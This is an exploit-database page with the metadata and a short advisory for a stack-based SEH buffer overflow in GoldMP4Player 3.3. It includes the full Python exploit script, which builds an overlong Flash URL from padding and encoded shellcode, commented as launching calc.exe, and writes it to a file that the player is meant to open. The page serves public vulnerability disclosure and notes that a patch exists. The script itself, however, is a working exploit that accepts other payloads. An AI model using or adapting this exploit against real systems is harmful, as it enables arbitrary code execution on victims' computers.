header-logo
Suggest Exploit
vendor:
GoldMP4Player
by:
Gabor Seljan
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GoldMP4Player
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:goldmp4player:goldmp4player:3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Win 7 En
2014

GoldMP4Player Buffer Overflow (SEH)

GoldMP4Player is vulnerable to a buffer overflow vulnerability when a maliciously crafted .swf file is opened via File -> Open Flash URL. The vulnerability is caused due to a boundary error when handling the URL parameter, which can result in a stack-based buffer overflow. This may allow a remote attacker to execute arbitrary code within the context of the application.

Mitigation:

Upgrade to the latest version of GoldMP4Player.
Source

Exploit-DB raw data:

#!/usr/bin/python
# coding: utf-8
#Exploit Title: GoldMP4Player Buffer Overflow (SEH)  
#Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html 
#Version: 3.3 
#Date: 27.02.2014                                                                 
#Tested on: Windows Win 7 En
# Howto / Notes:
#open the URL in filename via File -> Open Flash URL\n";
#-------------------------------------------------------
'''Credits:
Vulnerability POC identified in v3.3 by Gabor Seljan
http://www.exploit-db.com/exploits/31914/'''
#------------------------------------------------------
head="http://"
buff="\x41" * 253
#shell calc.exe
buff+=("ëÿÿœ¼‰áÛÖÙqôZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8"
"ABuJIylHhlIePePGpapMYJEFQiBBDlKpRVPnk3btLNkv24TlKrRDhdOMgBj7Vtq9oTq9PllUlpac"
"LdBFLa09QHO4M31kwjBL01BpWLKpRvpNk3rElFaZpnk1PBXou9PQdPJvajpbplKrhR8NkpXa0wqI"
"CIsgLqYlKp4nkgqKfEakOVQIPllzaHOtMuQxGGHYpsEJTVcSMYh5kqm141ehbchNkshtdWqYC0fLK"
"fl2klKrx5LWqxSlKgtlKuQxPmYstEtEtsksku10YcjpQkOypf8QOpZLKeBhkk6QMSZ31nmouMiGpEP"
"s0f02HdqlKpoLGkOjuOKjPOEI2QFCXi6NuoMomkOju5ls6SL6jOpkKYpsE4EOKBgdSd20orJWppSio"
"IERCParLbCDnbEsH0e30AA")
head2=".swf"

exploit=head + buff + head2
try:
    out_file = open("exploit.txt",'w')
    out_file.write(exploit)
    out_file.close()
except:
    print "Error"

Navigation

Suggest Exploit

Services By CQR